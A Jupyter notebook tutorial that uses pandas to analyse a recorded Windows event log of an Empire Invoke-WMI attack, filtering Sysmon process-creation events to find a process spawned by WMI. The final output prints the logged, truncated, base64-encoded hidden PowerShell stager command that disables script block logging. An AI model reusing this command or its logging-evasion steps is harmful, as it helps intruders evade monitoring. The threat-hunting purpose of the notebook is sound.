Basic Event Log Analysis with Pandas


Goals:

  • Learn how to read a security event log in JSON format
  • Explore the data and run a few filters
  • Plot basic charts using dataframes and matplotlib

Import Libraries


In [1]:
import pandas as pd
from pandas.io.json import json_normalize
import json
import matplotlib.pyplot as plt

Read JSON File


In [3]:
invoke_wmi_df = pd.read_json('datasets/empire_invoke_wmi_2019-05-18214442.json', lines=True)

In [4]:
invoke_wmi_df.head()


Out[4]:
@timestamp @metadata type event_id event_data log_name source_name level task computer_name ... keywords beat host version thread_id activity_id process_id user provider_guid user_data
0 2019-05-18T21:44:40.083Z {'beat': 'winlogbeat', 'type': 'doc', 'version... wineventlog 800 {'param2': ' DetailSequence=1 DetailTotal=1 ... Windows PowerShell PowerShell Information Pipeline Execution Details IT001.shire.com ... [Classic] {'name': 'WECserver', 'hostname': 'WECserver',... {'name': 'WECserver'} NaN NaN NaN NaN NaN NaN NaN
1 2019-05-18T21:44:40.083Z {'beat': 'winlogbeat', 'type': 'doc', 'version... wineventlog 800 {'param1': ' $IV=[BitConverter]::GetByt... Windows PowerShell PowerShell Information Pipeline Execution Details IT001.shire.com ... [Classic] {'name': 'WECserver', 'hostname': 'WECserver',... {'name': 'WECserver'} NaN NaN NaN NaN NaN NaN NaN
2 2019-05-18T21:44:40.083Z {'beat': 'winlogbeat', 'type': 'doc', 'version... wineventlog 800 {'param1': ' 0..255 | ForEach-Objec... Windows PowerShell PowerShell Information Pipeline Execution Details IT001.shire.com ... [Classic] {'hostname': 'WECserver', 'version': '6.7.0', ... {'name': 'WECserver'} NaN NaN NaN NaN NaN NaN NaN
3 2019-05-18T21:44:40.083Z {'beat': 'winlogbeat', 'type': 'doc', 'version... wineventlog 800 {'param1': ' $5... Windows PowerShell PowerShell Information Pipeline Execution Details IT001.shire.com ... [Classic] {'name': 'WECserver', 'hostname': 'WECserver',... {'name': 'WECserver'} NaN NaN NaN NaN NaN NaN NaN
4 2019-05-18T21:44:40.083Z {'beat': 'winlogbeat', 'type': 'doc', 'version... wineventlog 800 {'param1': ' $s... Windows PowerShell PowerShell Information Pipeline Execution Details IT001.shire.com ... [Classic] {'name': 'WECserver', 'hostname': 'WECserver',... {'name': 'WECserver'} NaN NaN NaN NaN NaN NaN NaN

5 rows × 23 columns


In [5]:
type(invoke_wmi_df)


Out[5]:
pandas.core.frame.DataFrame

Explore File


In [6]:
invoke_wmi_df.shape


Out[6]:
(5271, 23)

In [7]:
invoke_wmi_df.iloc[0]


Out[7]:
@timestamp                                2019-05-18T21:44:40.083Z
@metadata        {'beat': 'winlogbeat', 'type': 'doc', 'version...
type                                                   wineventlog
event_id                                                       800
event_data       {'param2': '	DetailSequence=1
	DetailTotal=1

...
log_name                                        Windows PowerShell
source_name                                             PowerShell
level                                                  Information
task                                    Pipeline Execution Details
computer_name                                      IT001.shire.com
opcode                                                        Info
message          Pipeline execution details for command line:  ...
record_number                                                 3295
keywords                                                 [Classic]
beat             {'name': 'WECserver', 'hostname': 'WECserver',...
host                                         {'name': 'WECserver'}
version                                                        NaN
thread_id                                                      NaN
activity_id                                                    NaN
process_id                                                     NaN
user                                                           NaN
provider_guid                                                  NaN
user_data                                                      NaN
Name: 0, dtype: object

Flatten Nested Columns


In [8]:
json_struct = json.loads(invoke_wmi_df.to_json(orient="records"))
invoke_wmi_flat = json_normalize(json_struct)

In [9]:
invoke_wmi_flat.iloc[0]


Out[9]:
@timestamp                   2019-05-18T21:44:40.083Z
type                                      wineventlog
event_id                                          800
log_name                           Windows PowerShell
source_name                                PowerShell
                                       ...           
event_data.SupportInfo1                           NaN
event_data.SupportInfo2                           NaN
event_data.ProcessingMode                         NaN
event_data.TaskName                               NaN
event_data.TaskContentNew                         NaN
Name: 0, Length: 172, dtype: object

Data Sources Available


In [10]:
invoke_wmi_flat.groupby(['source_name']).size()


Out[10]:
source_name
Microsoft-Windows-GroupPolicy             1
Microsoft-Windows-PowerShell            711
Microsoft-Windows-Security-Auditing     535
Microsoft-Windows-Sysmon               3180
Microsoft-Windows-WMI-Activity            3
PowerShell                              841
dtype: int64

Filter on Sysmon Events


In [11]:
sysmon_filter = invoke_wmi_flat['source_name'] == "Microsoft-Windows-Sysmon"
sysmon_df = invoke_wmi_flat[sysmon_filter]

In [12]:
sysmon_df.iloc[0]


Out[12]:
@timestamp                               2019-05-18T21:44:40.105Z
type                                                  wineventlog
event_id                                                       12
log_name                     Microsoft-Windows-Sysmon/Operational
source_name                              Microsoft-Windows-Sysmon
                                             ...                 
event_data.SupportInfo1                                       NaN
event_data.SupportInfo2                                       NaN
event_data.ProcessingMode                                     NaN
event_data.TaskName                                           NaN
event_data.TaskContentNew                                     NaN
Name: 21, Length: 172, dtype: object

Filter on Process Creation Events (EID 1)


In [13]:
sysmon_filter2 = sysmon_df['event_id'] == 1
sysmon_proc_create = sysmon_df[sysmon_filter2]

In [14]:
sysmon_proc_create.iloc[0]


Out[14]:
@timestamp                               2019-05-18T21:44:57.732Z
type                                                  wineventlog
event_id                                                        1
log_name                     Microsoft-Windows-Sysmon/Operational
source_name                              Microsoft-Windows-Sysmon
                                             ...                 
event_data.SupportInfo1                                       NaN
event_data.SupportInfo2                                       NaN
event_data.ProcessingMode                                     NaN
event_data.TaskName                                           NaN
event_data.TaskContentNew                                     NaN
Name: 354, Length: 172, dtype: object

Drop Empty Fields on Process Create Dataframe


In [15]:
sysmon_proc_create = sysmon_proc_create.dropna(axis = 1, how = 'all')

In [16]:
sysmon_proc_create.iloc[0]


Out[16]:
@timestamp                                               2019-05-18T21:44:57.732Z
type                                                                  wineventlog
event_id                                                                        1
log_name                                     Microsoft-Windows-Sysmon/Operational
source_name                                              Microsoft-Windows-Sysmon
level                                                                 Information
task                                         Process Create (rule: ProcessCreate)
computer_name                                                     IT001.shire.com
opcode                                                                       Info
message                         Process Create:\nRuleName: \nUtcTime: 2019-05-...
record_number                                                             2996367
version                                                                         5
thread_id                                                                    2136
process_id                                                                   2508
provider_guid                              {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
@metadata.beat                                                         winlogbeat
@metadata.type                                                                doc
@metadata.version                                                           6.7.0
@metadata.topic                                                        winlogbeat
host_name                                                               WECserver
beat.hostname                                                           WECserver
beat.version                                                                6.7.0
host.name                                                               WECserver
user.domain                                                          NT AUTHORITY
user.type                                                                    User
user.identifier                                                          S-1-5-18
user.name                                                                  SYSTEM
event_data.UtcTime                                        2019-05-18 21:44:57.730
event_data.ProcessGuid                     {aa6b4a20-7cd9-5ce0-0000-0010a3801e00}
event_data.ProcessId                                                         1900
event_data.Image                       C:\Windows\System32\backgroundTaskHost.exe
event_data.User                                                    SHIRE\pgustavo
event_data.Product                           Microsoft® Windows® Operating System
event_data.IntegrityLevel                                            AppContainer
event_data.TerminalSessionId                                                    1
event_data.Hashes               SHA1=339E4E69D2120B97CE34B9A8D3597FF8E0A73561,...
event_data.CurrentDirectory     C:\Windows\SystemApps\Microsoft.Windows.Conten...
event_data.LogonId                                                        0x9fa53
event_data.Company                                          Microsoft Corporation
event_data.ParentProcessGuid               {aa6b4a20-7719-5ce0-0000-001068a30000}
event_data.ParentImage                            C:\Windows\System32\svchost.exe
event_data.LogonGuid                       {aa6b4a20-79fe-5ce0-0000-002053fa0900}
event_data.ParentCommandLine     C:\Windows\system32\svchost.exe -k DcomLaunch -p
event_data.FileVersion                        10.0.17763.1 (WinBuild.160101.0800)
event_data.ParentProcessId                                                    716
event_data.Description                                       Background Task Host
event_data.CommandLine          "C:\Windows\system32\backgroundTaskHost.exe" -...
Name: 354, dtype: object

Group By Specific Fields


In [17]:
sysmon_proc_create.groupby(['event_data.ParentImage']).size()


Out[17]:
event_data.ParentImage
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe     2
C:\Windows\System32\gpupdate.exe                              1
C:\Windows\System32\services.exe                              1
C:\Windows\System32\svchost.exe                              10
C:\Windows\System32\wbem\WmiPrvSE.exe                         1
C:\Windows\System32\winlogon.exe                              1
dtype: int64

Enrich Data


In [18]:
sysmon_proc_create['command_count'] = sysmon_proc_create['event_data.CommandLine'].str.len()

In [19]:
sysmon_proc_create.iloc[1]


Out[19]:
@timestamp                                               2019-05-18T21:44:58.050Z
type                                                                  wineventlog
event_id                                                                        1
log_name                                     Microsoft-Windows-Sysmon/Operational
source_name                                              Microsoft-Windows-Sysmon
level                                                                 Information
task                                         Process Create (rule: ProcessCreate)
computer_name                                                     IT001.shire.com
opcode                                                                       Info
message                         Process Create:\nRuleName: \nUtcTime: 2019-05-...
record_number                                                             2996477
version                                                                         5
thread_id                                                                    2136
process_id                                                                   2508
provider_guid                              {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
@metadata.beat                                                         winlogbeat
@metadata.type                                                                doc
@metadata.version                                                           6.7.0
@metadata.topic                                                        winlogbeat
host_name                                                               WECserver
beat.hostname                                                           WECserver
beat.version                                                                6.7.0
host.name                                                               WECserver
user.domain                                                          NT AUTHORITY
user.type                                                                    User
user.identifier                                                          S-1-5-18
user.name                                                                  SYSTEM
event_data.UtcTime                                        2019-05-18 21:44:58.048
event_data.ProcessGuid                     {aa6b4a20-7cda-5ce0-0000-0010db921e00}
event_data.ProcessId                                                         4624
event_data.Image                            C:\Windows\System32\RuntimeBroker.exe
event_data.User                                                    SHIRE\pgustavo
event_data.Product                           Microsoft® Windows® Operating System
event_data.IntegrityLevel                                                  Medium
event_data.TerminalSessionId                                                    1
event_data.Hashes               SHA1=EE8FDECE70D4D64D2C422E3F6861E066E85BD139,...
event_data.CurrentDirectory                                  C:\Windows\system32\
event_data.LogonId                                                        0x9fa53
event_data.Company                                          Microsoft Corporation
event_data.ParentProcessGuid               {aa6b4a20-7719-5ce0-0000-001068a30000}
event_data.ParentImage                            C:\Windows\System32\svchost.exe
event_data.LogonGuid                       {aa6b4a20-79fe-5ce0-0000-002053fa0900}
event_data.ParentCommandLine     C:\Windows\system32\svchost.exe -k DcomLaunch -p
event_data.FileVersion                        10.0.17763.1 (WinBuild.160101.0800)
event_data.ParentProcessId                                                    716
event_data.Description                                             Runtime Broker
event_data.CommandLine           C:\Windows\System32\RuntimeBroker.exe -Embedding
command_count                                                                  48
Name: 464, dtype: object

Visualize Data


In [20]:
sysmon_proc_create.plot(kind='bar',x='event_data.ParentImage',y='command_count')


Out[20]:
<matplotlib.axes._subplots.AxesSubplot at 0x7f3ab934b860>

Filter On Interesting Events


In [21]:
sysmon_filter3 = sysmon_proc_create['event_data.ParentImage'] == "C:\Windows\System32\wbem\WmiPrvSE.exe"
sysmon_proc_create[sysmon_filter3]['event_data.ProcessGuid']


Out[21]:
780    {aa6b4a20-7cde-5ce0-0000-00109ea71e00}
Name: event_data.ProcessGuid, dtype: object

In [22]:
sysmon_filter4 = sysmon_proc_create['event_data.ProcessGuid'] =="{aa6b4a20-7cde-5ce0-0000-00109ea71e00}"

Display Results


In [23]:
with pd.option_context('display.max_colwidth', 2000):
    print(sysmon_proc_create[sysmon_filter4]['event_data.CommandLine'])


780    C:\Windows\System32\WindowsPowershell\v1.0\powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAHIAUwBpAE8AbgBUAEEAQgBMAGUALgBQAFMAVgBlAHIAUwBJAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBFACAAMwApAHsAJAAyADQAMQBmAD0AWwBSAEUAZgBdAC4AQQBTAFMARQBtAGIATAB5AC4ARwBFAFQAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdABpAGwAcwAnACkALgAiAEcARQB0AEYAaQBFAGAAbABkACIAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMAeQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAEYAKAAkADIANAAxAGYAKQB7ACQARgAwADkAQQA9ACQAMgA0ADEARgAuAEcAZQBUAFYAYQBsAFUAZQAoACQAbgBVAEwATAApADsASQBmACgAJABGADAAOQBBAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAZgAwADkAQQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABmADAAOQBhAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAdgBBAEwAPQBbAEMATwBsAEwARQBjAHQASQBvAG4AUwAuAEcARQBuAEUAcgBpAGMALgBEAEkAYwBUAGkAbwBuAGEAUgB5AFsAUwB0AHIASQBOAGcALABTAFkAUwBUAEUAbQAuAE8AYgBKAEUAYwBUAF0AXQA6ADoATgBlAFcAKAApADsAJAB2AEEATAAuAEEAZABkACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAB2AGEATAAuAEEARABkACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAEYAMAA5AGEAWwAnAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaABlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQA9ACQAdgBBAGwAfQBFAGwAUwBFAHsAWwBTAGMAcgBpAHAAdABCAGwATwBDAEsAXQAuACIARwBFAHQARgBJAGUAYABsAGQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQBUAFYAYQBsAFUARQAoACQAbgB1AEwAb...
Name: event_data.CommandLine, dtype: object

In [ ]: